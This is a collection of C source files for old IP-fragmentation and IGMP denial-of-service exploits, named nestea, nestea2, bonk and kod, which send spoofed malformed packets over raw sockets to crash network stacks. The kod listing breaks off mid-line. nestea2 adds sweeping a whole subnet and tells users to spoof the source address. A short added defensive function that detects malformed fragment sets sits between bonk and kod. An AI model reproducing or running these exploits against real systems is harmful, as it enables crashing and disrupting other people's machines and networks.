 #include <netdb.h>
 #include <netinet/in.h>
 #include <netinet/udp.h>
 #include <arpa/inet.h>
 #include <sys/types.h>
 #include <sys/time.h>
 #include <sys/socket.h>

 // bsd usage is currently broken because of socket options on the third sendto

 #ifdef STRANGE_BSD_BYTE_ORDERING_THING
                         /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
 #define FIX(n)  (n)
 #else                   /* OpenBSD 2.1, all Linux */
 #define FIX(n)  htons(n)
 #endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

 #define IP_MF   0x2000  /* More IP fragment en route */
 #define IPH     0x14    /* IP header size */
 #define UDPH    0x8     /* UDP header size */
 #define MAGIC2  108
 #define PADDING 256    /* datagram frame padding for first packet */
 #define COUNT   500    /* we are overwriting a small number of bytes we
                         shouldn't have access to in the kernel.
                         to be safe, we should hit them till they die :>  */

 void usage(u_char *);
 u_long name_resolve(u_char *);
 u_short in_cksum(u_short *, int);
 void send_frags(int, u_long, u_long, u_short, u_short);

 int main(int argc, char **argv)
 {
     int one = 1, count = 0, i, rip_sock;
     u_long  src_ip = 0, dst_ip = 0;
     u_short src_prt = 0, dst_prt = 0;
     struct in_addr addr;


     if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
     {
         perror("raw socket");
         exit(1);
     }
     if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
         < 0)
     {
         perror("IP_HDRINCL");
         exit(1);
     }
     if (argc < 3) usage(argv[0]);
     if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
     {
         fprintf(stderr, "What the hell kind of IP address is that?\n");
         exit(1);
     }

     while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
     {
         switch (i)
         {
             case 's':               /* source port (should be ephemeral) */
                 src_prt = (u_short)atoi(optarg);
                 break;
             case 't':               /* dest port (DNS, anyone?) */
                 dst_prt = (u_short)atoi(optarg);
                 break;
             case 'n':               /* number to send */
                 count   = atoi(optarg);
                 break;
             default :
                 usage(argv[0]);
                 break;              /* NOTREACHED */
         }
     }
     srandom((unsigned)(time((time_t)0)));
     if (!src_prt) src_prt = (random() % 0xffff);
     if (!dst_prt) dst_prt = (random() % 0xffff);
     if (!count)   count   = COUNT;

     fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
     fprintf(stderr, "Death on flaxen wings (yet again):\n");
     addr.s_addr = src_ip;
     fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
     addr.s_addr = dst_ip;
     fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
     fprintf(stderr, " Amt: %5d\n", count);
     fprintf(stderr, "[ ");

     for (i = 0; i < count; i++)
     {
         send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
         fprintf(stderr, "b00m ");
         usleep(500);
     }
     fprintf(stderr, "]\n");
     return (0);
 }

 void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                 u_short dst_prt)
 {
 int i;
     u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
     u_char byte;                            /* a byte */
     struct sockaddr_in sin;                 /* socket protocol structure */

     sin.sin_family      = AF_INET;
     sin.sin_port        = src_prt;
     sin.sin_addr.s_addr = dst_ip;

     packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

     if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

     if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
     byte = 0x4F;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 44;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

         for(i=0;i<PADDING;i++)
         {
                 p_ptr[i++]=random()%255;
         }

     if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }
     free(packet);
 }

 u_long name_resolve(u_char *host_name)
 {
     struct in_addr addr;
     struct hostent *host_ent;

     if ((addr.s_addr = inet_addr(host_name)) == -1)
     {
         if (!(host_ent = gethostbyname(host_name))) return (0);
         bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
     }
     return (addr.s_addr);
 }

 void usage(u_char *name)
 {
     fprintf(stderr,
             "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
             name);
     exit(0);
 }

 ----- cut ----- cut -----

 ----- nestea2.c ----- cut ----- cut -----

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <netinet/udp.h>
 #include <arpa/inet.h>
 #include <sys/types.h>
 #include <sys/time.h>
 #include <sys/socket.h>

 #ifdef STRANGE_BSD_BYTE_ORDERING_THING
                         /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
 #define FIX(n)  (n)
 #else                   /* OpenBSD 2.1, all Linux */
 #define FIX(n)  htons(n)
 #endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

 #define IP_MF   0x2000  /* More IP fragment en route */
 #define IPH     0x14    /* IP header size */
 #define UDPH    0x8     /* UDP header size */
 #define MAGIC2  108
 #define PADDING 256    /* datagram frame padding for first packet */
 #define COUNT   500    /* we are overwriting a small number of bytes we
                         shouldn't have access to in the kernel.
                         to be safe, we should hit them till they die :>  */
 struct ipstuph
 {
         int p1;
         int p2;
         int p3;
         int p4;
 } startip, endip;

 void usage(u_char *);
 u_long name_resolve(u_char *);
 u_short in_cksum(u_short *, int);
 void send_frags(int, u_long, u_long, u_short, u_short);

 int main(int argc, char **argv)
 {
     int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
     u_long  src_ip = 0, dst_ip = 0;
     u_short src_prt = 0, dst_prt = 0;
     char hit_ip[18], dst_ip2[18];
     struct in_addr addr;

     fprintf(stderr, "\nNestea v2 originally by: humble + ttol mods\n");
     fprintf(stderr, "Color and Instructions was done by : ttol\n");
     fprintf(stderr, "Note : ttol released Nestea v2.  humble had nothing to do with \n       it, don't nag him about it.  -ttol@ttol.net\n\n");

     if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
     {
         perror("raw socket");
         exit(1);
     }
     if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
         < 0)
     {
         perror("IP_HDRINCL");
         exit(1);
     }
     if (argc < 4) usage(argv[0]);
     if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
     {
         fprintf(stderr, "What the hell kind of IP address is that?\n");
         exit(1);
     }

     strcpy(dst_ip2,argv[3]);
     if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
                       &startip.p4) != 4)
     {
       fprintf(stderr, "Error, arg2(startip) : Need an ip that contains 4 zones\n");
       exit(1);
     }
     if (startip.p1 > 255) {
       fprintf(stderr, "Error : Zone 1 of start ip is incorrect \
                        (greater than 255)\n");
       exit(1);
     }
     if (startip.p2 > 255) {
       fprintf(stderr, "Error : Zone 2 of start ip is incorrect \
                        (greater than 255)\n");
       exit(1);
     }
     if (startip.p3 > 255) {
       fprintf(stderr, "Error : Zone 3 of start ip is incorrect \
                        (greater than 255)\n");
       exit(1);
     }
     if (startip.p4 > 255) {
       fprintf(stderr, "Error : Zone 4 of start ip is incorrect \
                        (greater than 255)\n");
        exit(1);
     }
     if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
                       &endip.p4) != 4)
     {
       fprintf(stderr, "Error, arg3(endip) : [[0;34mNeed an ip that \
                        contains 4 zones[[0m\n");
       exit(1);
     }
     if (endip.p1 > 255) {
       fprintf(stderr, "Error : Zone 1 of end ip is incorrect \
                        (greater than 255)\n");
       exit(1);
     }
     if (endip.p2 > 255) {
       fprintf(stderr, "Error : Zone 2 of end ip is incorrect \
                        (greater than 255)\n");
       exit(1);
     }
     if (endip.p3 > 255) {
       fprintf(stderr, "Error : Zone 3 of end ip is incorrect
                        (greater than 255)\n");
       exit(1);
     }
     if (endip.p4 > 255) {
       fprintf(stderr, "Error : Zone 4 of end ip is incorrect
                        (greater than 255)\n");
       exit(1);
     }
     if (startip.p1 != endip.p1) {
       fprintf(stderr, "Error : Zone 1 of start ip and end ip is different\n");
       exit(1);
     }
     if (startip.p2 != endip.p2) {
       fprintf(stderr, "Error : Zone 2 of start ip and end ip is different\n");
       exit(1);
     }
     if (startip.p3 != endip.p3) {
       fprintf(stderr, "Error : Zone 3 of start ip and end ip is different\n");
       exit(1);
     }

     while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
     {
         switch (i)
         {
             case 's':               /* source port (should be ephemeral) */
                 src_prt = (u_short)atoi(optarg);
                 break;
             case 't':               /* dest port (DNS, anyone?) */
                 dst_prt = (u_short)atoi(optarg);
                 break;
             case 'n':               /* number to send */
                 count   = atoi(optarg);
                 break;
             case 'q':               /* quiet mode */
                 bequiet = 1;
                 break;
             default :
                 usage(argv[0]);
                 break;              /* NOTREACHED */
         }
     }
     srandom((unsigned)(time((time_t)0)));
     if (!src_prt) src_prt = (random() % 0xffff);
     if (!dst_prt) dst_prt = (random() % 0xffff);
     if (!count)   count   = COUNT;

     fprintf(stderr, "Death on flaxen wings (yet again):\n");
     addr.s_addr = src_ip;
     fprintf(stderr, "From: %15s.%d\n", inet_ntoa(addr), src_prt);
     addr.s_addr = dst_ip;
     fprintf(stderr, "  To: %15s - %s.%d\n", inet_ntoa(addr),
                                                 dst_ip2, dst_prt);
     fprintf(stderr, " Amt: %5d\n", count);

     if (bequiet) fprintf(stderr, "[quiet mode] Each'.' represents a nuked ip.  [");
     for (j=startip.p4; j <= endip.p4; j++)
     {
       sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);

       if (!(bequiet)) fprintf(stderr, "%s [ ", hit_ip);

       if (!(dst_ip = name_resolve(hit_ip)))
     {
           fprintf(stderr, "What the hell kind of IP address is that?\n");
           exit(1);
     }

     for (i = 0; i < count; i++)
     {
         send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
         if (!(bequiet)) fprintf(stderr, "d00m ");
         usleep(500);
     }
     if (bequiet) fprintf(stderr, ".");
     else fprintf(stderr, "]\n");
     }
     if (bequiet) fprintf(stderr, "]\n");
     return (0);
 }

 void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                 u_short dst_prt)
 {
 int i;
     u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
     u_char byte;                            /* a byte */
     struct sockaddr_in sin;                 /* socket protocol structure */

     sin.sin_family      = AF_INET;
     sin.sin_port        = src_prt;
     sin.sin_addr.s_addr = dst_ip;

     packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

     if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

     byte = 0x45;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 4;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

     if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }

     p_ptr  = packet;
     bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
     byte = 0x4F;                        /* IP version and header length */
     memcpy(p_ptr, &byte, sizeof(u_char));
     p_ptr += 2;                         /* IP TOS (skipped) */
     *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(242);   /* IP id */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
     p_ptr += 2;
     *((u_short *)p_ptr) = 0x40;         /* IP TTL */
     byte = IPPROTO_UDP;
     memcpy(p_ptr + 1, &byte, sizeof(u_char));
     p_ptr += 4;                         /* IP checksum filled in by kernel */
     *((u_long *)p_ptr) = src_ip;        /* IP source address */
     p_ptr += 4;
     *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
     p_ptr += 44;
     *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
     p_ptr += 2;
     *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

         for(i=0;i<PADDING;i++)
         {
                 p_ptr[i++]=random()%255;
         }

     if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(packet);
         exit(1);
     }
     free(packet);
 }

 u_long name_resolve(u_char *host_name)
 {
     struct in_addr addr;
     struct hostent *host_ent;

     if ((addr.s_addr = inet_addr(host_name)) == -1)
     {
         if (!(host_ent = gethostbyname(host_name))) return (0);
         bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
     }
     return (addr.s_addr);
 }

 void usage(u_char *name)
 {
     fprintf(stderr,
 "nestea2 source startIP endIP [-s src port] [-t dest port] [-n quantity] [-q]\n");
     fprintf(stderr, "source   : This is the source IP to nestea from, make it a spoof\n");
     fprintf(stderr, "startIP  : From which IP should we start from? (eg 153.35.85.1)\n");
     fprintf(stderr, "endIP    : From which IP should we end with?   (eg 153.35.95.255)\n");
     fprintf(stderr, "src port : This is the source port to spoof from (OPTIONAL)\n");
     fprintf(stderr, "dest port: This is the destination port to nestea to (OPTIONAL)\n");
     fprintf(stderr, "quantity : This is how many times to nestea the victim (preferred is 1000)\n");
     fprintf(stderr, "-q       : This is quiet mode so you don't see the d00m's\n\n");
     fprintf(stderr, "Example  : nestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000\n");
     fprintf(stderr, "The above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times\n");
     fprintf(stderr, "Example2 : nestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000\n");
     fprintf(stderr, "The above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times\n");
     fprintf(stderr, "I perfer example2, probably because it is the lazy man's way out\n\n");
     fprintf(stderr, "                             NOT TO BE DISTRIBUTED!\n");
      exit(0);

 }

 ----- cut ----- cut -----

 ----- bonk.c ----- cut ----- cut -----

 /*

   [ http://www.rootshell.com/ ]

                                 ==bendi - 1998==

                         bonk.c        -         5/01/1998
         Based On: teardrop.c by route|daemon9 & klepto
         Crashes *patched* win95/(NT?) machines.

         Basically, we set the frag offset > header length (teardrop
         reversed). There are many theories as to why this works,
         however i do not have the resources to perform extensive testing.
         I make no warranties. Use this code at your own risk.
         Rip it if you like, i've had my fun.

 */

 #include <stdio.h>
 #include <string.h>

 #include <netdb.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/ip_udp.h>
 #include <netinet/protocols.h>
 #include <arpa/inet.h>

 #define FRG_CONST       0x3
 #define PADDING         0x1c

 struct udp_pkt
 {
         struct iphdr    ip;
         struct udphdr   udp;
         char data[PADDING];
 } pkt;

 int     udplen=sizeof(struct udphdr),
         iplen=sizeof(struct iphdr),
         datalen=100,
         psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
         spf_sck;                        /* Socket */

 void usage(void)
 {
         fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
         exit(0);
 }

 u_long host_to_ip(char *host_name)
 {
         static  u_long ip_bytes;
         struct hostent *res;

         res = gethostbyname(host_name);
         if (res == NULL)
                 return (0);
         memcpy(&ip_bytes, res->h_addr, res->h_length);
         return (ip_bytes);
 }

 void quit(char *reason)
 {
         perror(reason);
         close(spf_sck);
         exit(-1);
 }

 int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
            int dst_prt)
 {
         int     bs;
         struct  sockaddr_in to;

         memset(&pkt, 0, psize);
                                                 /* Fill in ip header */
         pkt.ip.version = 4;
         pkt.ip.ihl = 5;
         pkt.ip.tot_len = htons(udplen + iplen + PADDING);
         pkt.ip.id = htons(0x455);
         pkt.ip.ttl = 255;
         pkt.ip.protocol = IP_UDP;
         pkt.ip.saddr = src_addr;
         pkt.ip.daddr = dst_addr;
         pkt.ip.frag_off = htons(0x2000);        /* more to come */

         pkt.udp.source = htons(src_prt);        /* udp header */
         pkt.udp.dest = htons(dst_prt);
         pkt.udp.len = htons(8 + PADDING);
                                                 /* send 1st frag */

         to.sin_family = AF_INET;
         to.sin_port = src_prt;
         to.sin_addr.s_addr = dst_addr;

         bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                 sizeof(struct sockaddr));

         pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
         pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                         /* 2nd frag */

         bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                 (struct sockaddr *) &to, sizeof(struct sockaddr));

         return bs;
 }

 void main(int argc, char *argv[])
 {
         u_long  src_addr,
                 dst_addr;

         int     i,
                 src_prt=53,
                 dst_prt=53,
                 bs = 1,
                 pkt_count = 10;         /* Default amount */

         if (argc < 3)
                 usage();

         if (argc == 4)
                 pkt_count = atoi(argv[3]);      /* 10 does the trick */

         /* Resolve hostnames */

         src_addr = host_to_ip(argv[1]);
         if (!src_addr)
                 quit("bad source host");
         dst_addr = host_to_ip(argv[2]);
         if (!dst_addr)
                 quit("bad target host");

         spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
         if (!spf_sck)
                 quit("socket()");
         if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
         sizeof(bs)) < 0)
                 quit("IP_HDRINCL");

         for (i = 0; i < pkt_count; ++i)
         {
                 fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
                 usleep(10000);
         }

         printf("Done.\n");
 }

 ----- cut ----- cut -----
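 The fragment pair that bonk.c builds can be recognised from IPv4 header
 fields alone. The C check below is an added example, not part of the
 original article or of bonk.c: it flags overlapping, misaligned or oversized
 fragment sets (more than the bonk case alone); the struct, enum and function
 names are made up for the illustration, and the sample values are constructed
 from the constants in the listing above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IP_FLAG_MF  0x2000u   /* "more fragments" bit in frag_off */
#define IP_OFF_MASK 0x1fffu   /* 13-bit offset, counted in 8-byte units */
#define MAX_FRAGS   64        /* assumed per-datagram tracking limit */

/* Anomaly bits returned by frag_check(). */
enum {
    FRAG_OK         = 0,
    FRAG_OVERLAP    = 1 << 0, /* payload range intersects an earlier one */
    FRAG_TOO_BIG    = 1 << 1, /* reassembled datagram would exceed 65535 */
    FRAG_BAD_ALIGN  = 1 << 2, /* non-final payload not a multiple of 8 */
    FRAG_BAD_LENGTH = 1 << 3, /* total length shorter than the header */
    FRAG_TOO_MANY   = 1 << 4  /* more fragments than we are willing to track */
};

/* Hypothetical descriptor: IPv4 header fields already in host byte order. */
struct frag {
    uint8_t  ihl;       /* header length in 32-bit words */
    uint16_t tot_len;   /* IP total length of this fragment */
    uint16_t frag_off;  /* flags + fragment offset */
};

/* Check every fragment that shares one (src, dst, protocol, id) key. */
unsigned frag_check(const struct frag *f, size_t n)
{
    uint32_t start[MAX_FRAGS], end[MAX_FRAGS];
    size_t seen = 0, i, j;
    unsigned flags = FRAG_OK;

    for (i = 0; i < n; i++) {
        uint32_t hlen = (uint32_t)f[i].ihl * 4;
        uint32_t s, e;

        if (f[i].ihl < 5 || f[i].tot_len < hlen) {
            flags |= FRAG_BAD_LENGTH;
            continue;
        }
        s = (uint32_t)(f[i].frag_off & IP_OFF_MASK) * 8;  /* first byte */
        e = s + (f[i].tot_len - hlen);                    /* one past last */

        if (e + hlen > 65535u)
            flags |= FRAG_TOO_BIG;
        if ((f[i].frag_off & IP_FLAG_MF) && (e - s) % 8 != 0)
            flags |= FRAG_BAD_ALIGN;
        for (j = 0; j < seen; j++)
            if (s < end[j] && start[j] < e)
                flags |= FRAG_OVERLAP;

        if (seen < MAX_FRAGS) {
            start[seen] = s;
            end[seen] = e;
            seen++;
        } else {
            flags |= FRAG_TOO_MANY;
        }
    }
    return flags;
}

/* Constructed from bonk.c's constants: tot_len 20 + 8 + 0x1c = 56 with MF
   set, then offset field FRG_CONST + 1 = 4 with tot_len 20 + FRG_CONST = 23. */
static const struct frag bonk_pair[] = {
    { 5, 56, 0x2000 },
    { 5, 23, 0x0004 },
};

/* Constructed benign case: 4000 payload bytes split for a 1500-byte MTU. */
static const struct frag benign[] = {
    { 5, 1500, 0x2000 | 0 },
    { 5, 1500, 0x2000 | 185 },
    { 5, 1060, 370 },
};

unsigned check_bonk_sample(void)   { return frag_check(bonk_pair, 2); }
unsigned check_benign_sample(void) { return frag_check(benign, 3); }

int main(void)
{
    printf("bonk pair: 0x%x\n", check_bonk_sample());
    printf("benign   : 0x%x\n", check_benign_sample());
    return 0;
}
```

 In a reassembly path the safe reaction to any non-zero result is to discard
 the whole fragment queue for that datagram instead of trimming and continuing.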

 ----- kod.c ----- cut ----- cut -----

 /*
 ::: kod.c (kiss of death) version 1.2
 ::: [author] kod.c bug found by klepto / klepto@levitate.net / rewritten by ignitor / ignitor@EFnet
 ::: [stuph ] works on bsd/linux/*nix
 ::: [notes ] bluescreens windows users(98/98se) and kills tcp stack
 ::: [m$ bug] windows handles igmp badly and this is the result
 ::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotrip/TFreak/napster
 ::: [greets] dist(test monkey)/naz(you rule period.)/#havok/#irc_addict/#kgb/#eof/everyone
 ::: [action] ./kod <host> and BEWM!
 ::: [rant  ] there will be lots of rewrites to this.. just get our name right!
 de omnibus dubitandum
 */

 /*
 windows core dump output (*whee*)
 An exception 0E has occurred at 0028:C14C9212 in VxD VIP (01) + 00006C72.
 This was called from 0028:C183FF54 in VcD PPPMAC (04) + 000079BR.
 It may be possible to continue normally(*not*).
 */


 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <netinet/in.h>
 #include <netdb.h>
 #include <sys/time.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <arpa/inet.h>
 #include <unistd.h>

 struct iphdr
 {
   unsigned char ihl:4, version:4, tos;
   unsigned short tot_len, id, frag_off;
   unsigned char ttl, protocol;
   unsigned short check;
   unsigned int saddr, daddr;
 };

 struct igmphdr
 {
   unsigned char type, code;
   unsigned short cksum;
   struct in_addr group;
 };

 unsigned short in_chksum(unsigned short *, int);
 long resolve(char *);

 long resolve(char *host)
 {
   struct hostent *hst;
   long addr;

   hst = gethostbyname(host);
   if (hst == NULL)
     return(-1);

   memcpy(&addr, hst->h_addr, hst->h_length);

   return(addr);
 }

 int main(int argc, char *argv[])
 {
   struct sockaddr_in dst;
   struct iphdr *ip;
   struct igmphdr *igmp;
   long daddr, saddr;
   int s, i=0, c, len;
   char buf[1500];

   if (argc < 3)
   {
     printf("KOD spoofer by Ignitor and klepto\n");
     printf("Usage: %s <src> <dst>\n", *argv);
     return(1);
   }

   daddr = resolve(argv[2]);
   saddr = resolve(argv[1]);

   memset(buf, 0, 1500);
   ip = (struct iphdr *)&buf;
   igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)];

   dst.sin_addr.s_addr = daddr;
   dst.sin_family = AF_INET;

   ip->ihl = 5;
   ip->version = 4;
   ip->tos = 0;
   ip->tot_len = htons(10933);
   ip->id = htons(48648);
   ip->ttl = 64;
   ip->protocol = IPPROTO_IGMP;
   ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
   ip->saddr = saddr;
   ip->daddr = daddr;

   s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
   if (s == -1)
     return(1);

   printf("Sending IGMP packets: %s -> %s\n", argv[1], argv[2]);

   for (c=0;c<2;c++)
   {
     len = 220;
     ip->frag_off = htons(0x73a);

     for (i=0;;i++)
     {
       if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,
